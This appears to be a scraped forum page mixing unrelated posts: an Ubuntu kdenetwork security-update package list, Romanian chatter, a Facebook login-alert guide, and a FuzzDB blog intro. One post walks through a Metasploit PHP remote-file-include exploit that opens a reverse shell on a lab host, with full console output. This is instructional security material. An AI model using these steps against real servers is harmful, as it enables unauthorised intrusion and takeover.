7682a74871408f8f516effbe16b3a131 http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-filesharing_4.2.2-0ubuntu2.3_lpia.deb Size/MD5: 624058 4f00e180aa09d6f1963341d3440d7892 http://ports.ubuntu.com/pool/main/k/kdenetwork/kget_4.2.2-0ubuntu2.3_lpia.deb Size/MD5: 1320932 418cdd5dc552eda619ab95c070fc79f9 http://ports.ubuntu.com/pool/main/k/kdenetwork/kopete_4.2.2-0ubuntu2.3_lpia.deb Size/MD5: 7048542 e8e80aba783e99ed94ac11bb48a8f443 http://ports.ubuntu.com/pool/main/k/kdenetwork/kppp_4.2.2-0ubuntu2.3_lpia.deb Size/MD5: 695420 e58d3c6307a00ac81670448f05112e54 http://ports.ubuntu.com/pool/main/k/kdenetwork/krdc_4.2.2-0ubuntu2.3_lpia.deb Size/MD5: 391594 58d0f6833dad3fc5e1cff266ef8a963b http://ports.ubuntu.com/pool/main/k/kdenetwork/krfb_4.2.2-0ubuntu2.3_lpia.deb Size/MD5: 462204 d838455fe3616defec605385a87739ae powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/k/kdenetwork/kde-zeroconf_4.2.2-0ubuntu2.3_powerpc.deb Size/MD5: 61934 4440ab0efce1523ab2e222478eb323e5 http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-dbg_4.2.2-0ubuntu2.3_powerpc.deb Size/MD5: 58841478 fc8aa37d150be45d14c0d4084f32b08c http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-dev_4.2.2-0ubuntu2.3_powerpc.deb Size/MD5: 191220 8e82e2b3c085669bf563f85c78944c41 http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-filesharing_4.2.2-0ubuntu2.3_powerpc.deb Size/MD5: 656476 defd14428fb678a3a9aaf22c0fd836a5 http://ports.ubuntu.com/pool/main/k/kdenetwork/kget_4.2.2-0ubuntu2.3_powerpc.deb Size/MD5: 1390460 e102452663bfac562e7108a8a710b6b1 http://ports.ubuntu.com/pool/main/k/kdenetwork/kopete_4.2.2-0ubuntu2.3_powerpc.deb Size/MD5: 7410846 f0137d96a4ae4e5eeb81fec49b0ec395 http://ports.ubuntu.com/pool/main/k/kdenetwork/kppp_4.2.2-0ubuntu2.3_powerpc.deb Size/MD5: 706054 a2ff5a18db7df9caadd7c13785cd2e21 http://ports.ubuntu.com/pool/main/k/kdenetwork/krdc_4.2.2-0ubuntu2.3_powerpc.deb Size/MD5: 397886 2c04d87997f72b97a5c6bb4f0a9b477a http://ports.ubuntu.com/pool/main/k/kdenetwork/krfb_4.2.2-0ubuntu2.3_powerpc.deb Size/MD5: 466632 2af258554b6bae4e0a3a5a644bd11fa8 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/k/kdenetwork/kde-zeroconf_4.2.2-0ubuntu2.3_sparc.deb Size/MD5: 55116 e725014d071958b67bdc53b14a964ce7 http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-dbg_4.2.2-0ubuntu2.3_sparc.deb Size/MD5: 55121252 76bd2b02862ec39c5b3e71b13bda0cf1 http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-dev_4.2.2-0ubuntu2.3_sparc.deb Size/MD5: 179814 e0cf2dfbc426329f124caddb50ec76c6 http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-filesharing_4.2.2-0ubuntu2.3_sparc.deb Size/MD5: 650470 ab9461f0d98b42da5f07706f933317d2 http://ports.ubuntu.com/pool/main/k/kdenetwork/kget_4.2.2-0ubuntu2.3_sparc.deb Size/MD5: 1330122 33a0d874942ea6e64f0e96334702b7ed http://ports.ubuntu.com/pool/main/k/kdenetwork/kopete_4.2.2-0ubuntu2.3_sparc.deb Size/MD5: 7139808 2e39f3523ba3676d5dcc18eae0f4248a http://ports.ubuntu.com/pool/main/k/kdenetwork/kppp_4.2.2-0ubuntu2.3_sparc.deb Size/MD5: 707380 a506a81af1e81deded12d9176109f147 http://ports.ubuntu.com/pool/main/k/kdenetwork/krdc_4.2.2-0ubuntu2.3_sparc.deb Size/MD5: 402042 260dad081331362ae089d336745e0563 http://ports.ubuntu.com/pool/main/k/kdenetwork/krfb_4.2.2-0ubuntu2.3_sparc.deb Size/MD5: 467340 0df8690fdee706f926d169eb7b9d72d7 Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_4.3.2-0ubuntu4.1.diff.gz Size/MD5: 49608 d171ba8c8bf38db27cce3533b695c324 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_4.3.2-0ubuntu4.1.dsc Size/MD5: 2336 2066dd83aa643a2044c8582968ca9846 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_4.3.2.orig.tar.gz Size/MD5: 8303321 b973ab4f9d005e8af52f42d3d3989f78 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_4.3.2-0ubuntu4.1_all.deb Size/MD5: 33346 2b0083fa2f492505c4d5f19a9bb3e417 http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/kopete-plugin-otr-kde4_4.3.2-0ubuntu4.1_all.deb Size/MD5: 33112 796bf485ecd474bb5b15d8be7384af68 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kde-zeroconf_4.3.2-0ubuntu4.1_amd64.deb Size/MD5: 53786 fdc1d7697b203026d1b6431e7b5d0b76 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-dbg_4.3.2-0ubuntu4.1_amd64.deb Size/MD5: 30547358 27daebc38b2f3239e6fd524c6f3188d8 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-filesharing_4.3.2-0ubuntu4.1_amd64.deb Size/MD5: 353054 52155ebf77af8ee0e66b7730521bb437 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kget_4.3.2-0ubuntu4.1_amd64.deb Size/MD5: 1077286 330cfbf464dd3ea5c0c35cff4c4bf10f http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kopete_4.3.2-0ubuntu4.1_amd64.deb Size/MD5: 5383038 e127e9a4765f94bf558b0e2cbdc44644 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kppp_4.3.2-0ubuntu4.1_amd64.deb Size/MD5: 603802 43f8f2a54f73ddaf836fd879cedf96f7 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krdc_4.3.2-0ubuntu4.1_amd64.deb Size/MD5: 403704 56e633ed3be28d94afb30b29ce9b10e4 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krfb_4.3.2-0ubuntu4.1_amd64.deb Size/MD5: 455306 b42bec391d435408b499c8fb1134b166 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/libkopete-dev_4.3.2-0ubuntu4.1_amd64.deb Size/MD5: 112642 61b30a923925303bd68f3138dc9688ca http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/libkopete4_4.3.2-0ubuntu4.1_amd64.deb Size/MD5: 381986 38252cdf28713bf92fa485c038148b46 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kde-zeroconf_4.3.2-0ubuntu4.1_i386.deb Size/MD5: 52238 e5695d1a7057fea135d350a993e4d06c http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-dbg_4.3.2-0ubuntu4.1_i386.deb Size/MD5: 30195210 154d7e066e3fcf99f02451fcab5461ad http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-filesharing_4.3.2-0ubuntu4.1_i386.deb Size/MD5: 333700 2026b4db1d1a1c411d08100e93916acc http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kget_4.3.2-0ubuntu4.1_i386.deb Size/MD5: 1064034 cfed546b2e496f7714c0e0398cb5ad35 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kopete_4.3.2-0ubuntu4.1_i386.deb Size/MD5: 5197500 c6136d2fd6a56267f342781291bf5382 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kppp_4.3.2-0ubuntu4.1_i386.deb Size/MD5: 591336 1460e8b55335823dbe53013f8869123d http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krdc_4.3.2-0ubuntu4.1_i386.deb Size/MD5: 393898 8ce0697073b5fa1f2d539006fbfdad69 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krfb_4.3.2-0ubuntu4.1_i386.deb Size/MD5: 451184 13afd3ce4fc6ebaf9d2d427e3a5a0d79 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/libkopete-dev_4.3.2-0ubuntu4.1_i386.deb Size/MD5: 112650 21e5387ccb603c39c179453523d0da20 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/libkopete4_4.3.2-0ubuntu4.1_i386.deb Size/MD5: 364400 6e390aa840164c73a258029b7b4a5bb4 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/k/kdenetwork/kde-zeroconf_4.3.2-0ubuntu4.1_lpia.deb Size/MD5: 52546 12fce31edd68ef33759d947365453014 http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-dbg_4.3.2-0ubuntu4.1_lpia.deb Size/MD5: 30274592 ab8db15984922077b96fd180866aafe6 http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-filesharing_4.3.2-0ubuntu4.1_lpia.deb Size/MD5: 343280 1be2db10f8260b63fff6a00fe2983643 http://ports.ubuntu.com/pool/main/k/kdenetwork/kget_4.3.2-0ubuntu4.1_lpia.deb Size/MD5: 1089894 d7f32f47a184416fbc40dcc4921a0bbc http://ports.ubuntu.com/pool/main/k/kdenetwork/kopete_4.3.2-0ubuntu4.1_lpia.deb Size/MD5: 5284270 a4017a7c59b1ddbcf543b11ecd2d5d29 http://ports.ubuntu.com/pool/main/k/kdenetwork/kppp_4.3.2-0ubuntu4.1_lpia.deb Size/MD5: 603762 66efad6b68fbc6221e2b2ceab664ce47 http://ports.ubuntu.com/pool/main/k/kdenetwork/krdc_4.3.2-0ubuntu4.1_lpia.deb Size/MD5: 398304 b47f9f31cedb427f1e5c665e4d65cdaa http://ports.ubuntu.com/pool/main/k/kdenetwork/krfb_4.3.2-0ubuntu4.1_lpia.deb Size/MD5: 453220 06a7f9dcfea03b8dd3ce7f70fe83d581 http://ports.ubuntu.com/pool/main/k/kdenetwork/libkopete-dev_4.3.2-0ubuntu4.1_lpia.deb Size/MD5: 112690 00073caaeb856c3aa8f4a53fd3ad610a http://ports.ubuntu.com/pool/main/k/kdenetwork/libkopete4_4.3.2-0ubuntu4.1_lpia.deb Size/MD5: 372508 c565979ce1651be50608cd5aa2db219f powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/k/kdenetwork/kde-zeroconf_4.3.2-0ubuntu4.1_powerpc.deb Size/MD5: 50916 b491aa86af24bbe2bc5811d723b51869 http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-dbg_4.3.2-0ubuntu4.1_powerpc.deb Size/MD5: 30304690 9153d362a22b727cc204f3cf7813148f http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-filesharing_4.3.2-0ubuntu4.1_powerpc.deb Size/MD5: 306004 3a4e8beec6f71354f5b7920939d58009 http://ports.ubuntu.com/pool/main/k/kdenetwork/kget_4.3.2-0ubuntu4.1_powerpc.deb Size/MD5: 1000272 4956b7033252449b144d71093a3e83ec http://ports.ubuntu.com/pool/main/k/kdenetwork/kopete_4.3.2-0ubuntu4.1_powerpc.deb Size/MD5: 4931610 d5633953620beb23f69697fee16a1237 http://ports.ubuntu.com/pool/main/k/kdenetwork/kppp_4.3.2-0ubuntu4.1_powerpc.deb Size/MD5: 579726 4a959c2af6b403b069ffbc3b090553aa http://ports.ubuntu.com/pool/main/k/kdenetwork/krdc_4.3.2-0ubuntu4.1_powerpc.deb Size/MD5: 389778 67424f78c1231dc251e073c8aeb73e3d http://ports.ubuntu.com/pool/main/k/kdenetwork/krfb_4.3.2-0ubuntu4.1_powerpc.deb Size/MD5: 450156 04824dfc0c02ec1d6db1e8372424a7c7 http://ports.ubuntu.com/pool/main/k/kdenetwork/libkopete-dev_4.3.2-0ubuntu4.1_powerpc.deb Size/MD5: 112676 4e9221c8212011bc1ccbe5b2f41650c4 http://ports.ubuntu.com/pool/main/k/kdenetwork/libkopete4_4.3.2-0ubuntu4.1_powerpc.deb Size/MD5: 342864 6a5cd525e9239ab5c375d66a82fcfe7d sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/k/kdenetwork/kde-zeroconf_4.3.2-0ubuntu4.1_sparc.deb Size/MD5: 50278 9691f810d00ddae5f50426facf8ff7ca http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-dbg_4.3.2-0ubuntu4.1_sparc.deb Size/MD5: 27742788 fe3d0621a9e9ce04ad04a4309255e547 http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-filesharing_4.3.2-0ubuntu4.1_sparc.deb Size/MD5: 307852 b975d548a77a9d499e460e92d117086b http://ports.ubuntu.com/pool/main/k/kdenetwork/kget_4.3.2-0ubuntu4.1_sparc.deb Size/MD5: 972896 7c6d494d00e8711aa57c35c7a55f3f8a http://ports.ubuntu.com/pool/main/k/kdenetwork/kopete_4.3.2-0ubuntu4.1_sparc.deb Size/MD5: 4871566 82e007e72cb3426f277856abc624a1b4 http://ports.ubuntu.com/pool/main/k/kdenetwork/kppp_4.3.2-0ubuntu4.1_sparc.deb Size/MD5: 584610 7b5865091beaae955e84cc636174f774 http://ports.ubuntu.com/pool/main/k/kdenetwork/krdc_4.3.2-0ubuntu4.1_sparc.deb Size/MD5: 387328 cbee8839813368202ec26cceabf16e6f http://ports.ubuntu.com/pool/main/k/kdenetwork/krfb_4.3.2-0ubuntu4.1_sparc.deb Size/MD5: 452414 881b05085cae03e930c6af4791e5e126 http://ports.ubuntu.com/pool/main/k/kdenetwork/libkopete-dev_4.3.2-0ubuntu4.1_sparc.deb Size/MD5: 112672 020e44bd6e8a1bfe264212d5da718c93 http://ports.ubuntu.com/pool/main/k/kdenetwork/libkopete4_4.3.2-0ubuntu4.1_sparc.deb Size/MD5: 333616 99477110177d40a0ef1f8d74a5502764 Updated packages for Ubuntu 10.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_4.4.2-0ubuntu4.1.diff.gz Size/MD5: 45422 4b8a30759d2c0b0c1912163f0acbfaf3 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_4.4.2-0ubuntu4.1.dsc Size/MD5: 2333 c0e8dde7ff74824eda8b2cf24f3cbe39 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_4.4.2.orig.tar.gz Size/MD5: 9372959 bc83487da6a628545339271fc09f8df7 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_4.4.2-0ubuntu4.1_all.deb Size/MD5: 34754 2eddeef5c1a71a0bb42e1283449dbcf9 http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/kopete-plugin-otr-kde4_4.4.2-0ubuntu4.1_all.deb Size/MD5: 34528 8ee3642769cfe6531f206874c50bcf59 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kde-zeroconf_4.4.2-0ubuntu4.1_amd64.deb Size/MD5: 55616 aae5be91a4717aa854b7e47ffb9aefaa http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-dbg_4.4.2-0ubuntu4.1_amd64.deb Size/MD5: 32678288 663f524a08574c1e066a0ea699b9459d http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-filesharing_4.4.2-0ubuntu4.1_amd64.deb Size/MD5: 344324 3384ab7fc8b8c81982378dbdbb2c3814 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kget_4.4.2-0ubuntu4.1_amd64.deb Size/MD5: 1967714 792fcf38cac9f6e8e158957d03ebd4fd http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kopete_4.4.2-0ubuntu4.1_amd64.deb Size/MD5: 5351044 b8aabf6d8928a4f86d95fba3098a9d6a http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kppp_4.4.2-0ubuntu4.1_amd64.deb Size/MD5: 602676 5ebec67ecedce776de7e842698aab3d3 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krdc_4.4.2-0ubuntu4.1_amd64.deb Size/MD5: 533422 55fdf8610ba7d48347f17e168129ff13 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krfb_4.4.2-0ubuntu4.1_amd64.deb Size/MD5: 421562 8bf38812fd74a392754aa665333976c8 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/libkopete-dev_4.4.2-0ubuntu4.1_amd64.deb Size/MD5: 111782 0559652d817a8e6b07b75b29e01422c1 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/libkopete4_4.4.2-0ubuntu4.1_amd64.deb Size/MD5: 357260 1c53072d67be68c77cfa2521066eae50 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kde-zeroconf_4.4.2-0ubuntu4.1_i386.deb Size/MD5: 54162 e270eb5432c7cb5abb1b3f19d64be1bd http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-dbg_4.4.2-0ubuntu4.1_i386.deb Size/MD5: 32265918 5930f4cd5b20b19503afe32f4fa3dd58 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-filesharing_4.4.2-0ubuntu4.1_i386.deb Size/MD5: 324776 8890aef17a646a365ca9e4ef864089bf http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kget_4.4.2-0ubuntu4.1_i386.deb Size/MD5: 1964356 0cc6f025334800b187ed47ea471c0ceb http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kopete_4.4.2-0ubuntu4.1_i386.deb Size/MD5: 5182098 5cf694d1ee61cb1e625a4104900a0999 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kppp_4.4.2-0ubuntu4.1_i386.deb Size/MD5: 589470 9bc46a9af8eb58d33ba329d68e99c179 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krdc_4.4.2-0ubuntu4.1_i386.deb Size/MD5: 524752 97b891cfc6d3d65018e01cc1508f47c6 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krfb_4.4.2-0ubuntu4.1_i386.deb Size/MD5: 417420 420b30eee678cd85247a61b332643c94 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/libkopete-dev_4.4.2-0ubuntu4.1_i386.deb Size/MD5: 111834 7575c176d4a5fc087c68e9d05fc73681 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/libkopete4_4.4.2-0ubuntu4.1_i386.deb Size/MD5: 341310 1529be759a108971486cc9668f6a5052 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/k/kdenetwork/kde-zeroconf_4.4.2-0ubuntu4.1_powerpc.deb Size/MD5: 52728 5550a9ff315932100b6813d8b9eb40d2 http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-dbg_4.4.2-0ubuntu4.1_powerpc.deb Size/MD5: 32392550 78741532f465cad6ea50486fcd5edc8a http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-filesharing_4.4.2-0ubuntu4.1_powerpc.deb Size/MD5: 297234 c56bb3f72d666e7dac6eda15b83df8b5 http://ports.ubuntu.com/pool/main/k/kdenetwork/kget_4.4.2-0ubuntu4.1_powerpc.deb Size/MD5: 1855154 8dd83c0e0b1ddbf767e946db9ed23f64 http://ports.ubuntu.com/pool/main/k/kdenetwork/kopete_4.4.2-0ubuntu4.1_powerpc.deb Size/MD5: 4911632 e2eb14a9f78db4f8e2200b09893cc4e2 http://ports.ubuntu.com/pool/main/k/kdenetwork/kppp_4.4.2-0ubuntu4.1_powerpc.deb Size/MD5: 577158 ef86ea1d453612d6f58f01a9c246178b http://ports.ubuntu.com/pool/main/k/kdenetwork/krdc_4.4.2-0ubuntu4.1_powerpc.deb Size/MD5: 519498 4370bbf37a533548574c5ede7bec0d8a http://ports.ubuntu.com/pool/main/k/kdenetwork/krfb_4.4.2-0ubuntu4.1_powerpc.deb Size/MD5: 415654 409f9d304bc1bcbca8dcb17633768a53 http://ports.ubuntu.com/pool/main/k/kdenetwork/libkopete-dev_4.4.2-0ubuntu4.1_powerpc.deb Size/MD5: 111792 88427df3150f66bfb34846f803e59f41 http://ports.ubuntu.com/pool/main/k/kdenetwork/libkopete4_4.4.2-0ubuntu4.1_powerpc.deb Size/MD5: 318476 aaeb91e9dc7d0d5e34e8b29bab2b101f sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/k/kdenetwork/kde-zeroconf_4.4.2-0ubuntu4.1_sparc.deb Size/MD5: 52396 1a856aa12c20a50cffc40ae3b51ff54f http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-dbg_4.4.2-0ubuntu4.1_sparc.deb Size/MD5: 30124916 62be9c5d1c503f2548aabb0b89194950 http://ports.ubuntu.com/pool/main/k/kdenetwork/kdenetwork-filesharing_4.4.2-0ubuntu4.1_sparc.deb Size/MD5: 306624 eddf4b13ca63d37b334f8a3f017b521f http://ports.ubuntu.com/pool/main/k/kdenetwork/kget_4.4.2-0ubuntu4.1_sparc.deb Size/MD5: 1828570 0593a5acc9fac5a3dd4451d5c555cbdf http://ports.ubuntu.com/pool/main/k/kdenetwork/kopete_4.4.2-0ubuntu4.1_sparc.deb Size/MD5: 4926090 3f6ee3cb129db4337698899fdf0a3a31 http://ports.ubuntu.com/pool/main/k/kdenetwork/kppp_4.4.2-0ubuntu4.1_sparc.deb Size/MD5: 589258 1745a2f3941afc3ac234adb287096653 http://ports.ubuntu.com/pool/main/k/kdenetwork/krdc_4.4.2-0ubuntu4.1_sparc.deb Size/MD5: 521266 c850be67b9d287156b7d7690c458f46d http://ports.ubuntu.com/pool/main/k/kdenetwork/krfb_4.4.2-0ubuntu4.1_sparc.deb Size/MD5: 417830 e5cab5fdddb93c55cacc039dff70d331 http://ports.ubuntu.com/pool/main/k/kdenetwork/libkopete-dev_4.4.2-0ubuntu4.1_sparc.deb Size/MD5: 111800 6181786aa3bd07af5a454822de356ac4 http://ports.ubuntu.com/pool/main/k/kdenetwork/libkopete4_4.4.2-0ubuntu4.1_sparc.deb Size/MD5: 312510 f10337747c6cde900fe7aa5e23fb3a38
  20. ce legatura are chromium os cu calculatoarele de 100 dolari ? None. Pot sa puna frumos ubuntu pe ele, la fel se vor comporta, pot modifica ubuntu ca sa ai o interfata grafica pompoasa ca la chromium. N-are relevanta ce sistem de operare introduci, din moment ce e opensource.
  21. begood

    Dape,am blog.

    citeste lumea, daca nu le lasi loc de comentariu, nu vor comenta.
  22. Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI. Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of: /[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]and make your PHPURI PHPURI /slogin_lib.inc.php?slogin_path=XXpathXXlet's see it in action msf > search php_include [*] Searching loaded modules for pattern 'php_include'... Exploits ======== Name Rank Description ---- ---- ----------- unix/webapp/php_include excellent PHP Remote File Include Generic Exploit msf > use exploit/unix/webapp/php_include msf exploit(php_include) > info Name: PHP Remote File Include Generic Exploit Version: 8762 Platform: PHP Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Provided by: hdm egypt Available targets: Id Name -- ---- 0 Automatic Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PATH / yes The base directory to prepend to the URL to try PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL PHPURI no The URI to request, with the include parameter changed to XXpathXX Proxies no Use a proxy chain RHOST yes The target address RPORT 80 yes The target port SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload information: Space: 32768 Description: This module can be used to exploit any generic PHP file include vulnerability, where the application includes code like the following: msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX msf exploit(php_include) > set PATH /1/ PATH => /1/ msf exploit(php_include) > set RHOST 192.168.6.68 RHOST => 192.168.6.68 msf exploit(php_include) > set RPORT 8899 RPORT => 8899 msf exploit(php_include) > set PAYLOAD php/reverse_php PAYLOAD => php/reverse_php msf exploit(php_include) > set LHOST 192.168.6.140 LHOST => 192.168.6.140 msf exploit(php_include) > exploit [*] Started bind handler [*] Using URL: http://192.168.6.140:8080/RvSIqhdft [*] PHP include server started. [*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30 %38%30%2f%52%76%53%49%71%68%64%66%74%3f [*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010 dir 0.jpeg header.inc.php license.txt slog_users.txt version.txt 1.jpeg index.asp old slogin.inc.php adminlog.php install.txt readme.txt slogin_genpass.php footer.inc.php launch.asp slog_users.php slogin_lib.inc.php http://carnal0wnage.attackresearch.com/node/421 id uid=33(www-data) gid=33(www-data) groups=33(www-data)
  23. Multam fain, in caz ca dispare de acolo, puteti sa-mi dati pm, le pun la pastrare.
  24. Facebook just announced a tool that notifies you by e-mail or SMS text message when someone logs into your Facebook profile from an unknown computer.The idea is to help you recognize when a hacker has broken into your account so you can respond quickly by either changing your password (if that’s still possible) or contacting Facebook. Once you enable the notifications, you’ll be required to identify each computer you use to log in when you first use it and choose whether or not it’s a private or public machine. You’ll be able to see a history of registrations from machines potentially used by hackers, and of course those hackers will be forced to type something into the identification field to get in, so you should be able to tell whether it was just a login that you forgot or not. Here’s a quick guide to turning this feature on and using it. Step 1: Go to Account Settings and Enable Notifications When you’re logged into Facebook, you’ll see the word “Account” in the top right corner of the browser window. Click there to get a drop-down menu of options, then click on “Account Settings,” as pictured below. You’ll end up looking at a page that lists ways you can customize your account, including “Name,” “Password,” “Linked Accounts” and “more.” As long as you don’t navigate away from the “Settings” tab, you’ll see “Account Security” close to the bottom of the list. Click “change” on the right to show the following option: Check “Yes” when you see the prompt, “Would you like to receive notifications for logins from new devices?” Then click “Save.” The feature is turned on. Now we’ll show you how to use it. Step 2: Log In and Register Your Computer The settings won’t be customizable until you register the computer you’re logged in with, so you’ll have to first log out and then log back in. You can do this from the “Accounts” button in the top-right corner, as we mentioned before. When you log in again, you’ll see a screen titled “Register this computer.” Type the name of the computer in (it can be anything you want as long as it’s something you’ll recognize and remember), and choose whether you want Facebook to remember this computer or not. Facebook suggests a good rule of thumb: If the computer is a public one (like one you’d use at a library, a shared work computer or a machine in your school’s computer lab), leave the box unchecked so it will have to be registered each time a new login occurs, leading to an email or text notification. If it’s a machine you use every day, then go ahead and check the box; you probably don’t want to receive an email every time you log into Facebook from a safe place! Now that your computer is registered, you can see more options when you revisit the “Account Settings” page where you first enabled the notifications. You’ll see a history of registrations; it won’t record every time you log into a computer that’s already registered, but it will record every new registration, which should include at least the first time any hacker logs in. You can check or uncheck the option to have the immediate notifications sent to your cell phone via text message in addition to the basic email option. Two More Things to Know Keep in mind that the certificate that identifies your computer when it logs into Facebook is stored by your browser in a library of cookies. These cookies might end up getting cleared for any number of reasons, so don’t worry if you have to re-register your regular machines from time to time. Facebook also implemented a new feature that asks security questions (like identifying your birthdate or who your first kiss was) when unrecognized and suspicious logins occur. If the would-be hacker can’t answer the question, he or she is out of luck. HOW TO: Get Notified When Someone Hacks Your Facebook
  25. Hi everyone, Today’s blog post is going to be short and sweet because the Realex Payments 10th birthday party last night has slightly reduced my levels of creativity today! I don’t want that to take anything away from the content in today’s blog though. The project I’m going to look at today should be a “must know/use” for all web application security testers in my opinion. The same probably applies to anyone developing a web application security testing tool. The FuzzDB project was created by Adam Muntner to give web application security testers a set of payloads which were representative of real world attack inputs/payloads. The reasons for creating the FuzzDB have been explained in detail on Adam’s blog but I have included the explanation from the Google code project page below: Why was fuzzdb created? The sets of payloads currently built in to open source fuzzing and scanning software is poorly representative of the total body of potential attack patterns. Commercial scanners are a bit better, but not much, and tend to lock these patterns away in obfuscated binaries. It’s impossible for a human pentester to encounter and memorize all permutations of the meta characters and hex encoding likely to cause error conditions to arise. The volume of patterns collected in fuzzdb implies that much application security testing in the past has utilized incomplete sets of malformed input test cases. Fuzzdb was created to aggregate all known attack payloads and common predictable resource names into usable fuzzer payload lists, categorized by function and platform, and make them freely available under an open source license. It is immediately usable by web application penetration testers and security researchers, and the license permits it’s use in improving the test cases built into open source and commercial testing software. The payloads were collected from a wide range of sources including RSnake’s XSS Cheat Sheet, commercial and open source scanners and researching old web exploits. How can I use the FuzzDB payloads? The easiest way to start using the FuzzDB payloads is to load them into the Burp Suite and use them with the Intruder tool. I wrote a tutorial for the Intruder tool recently which explains how to load payloads 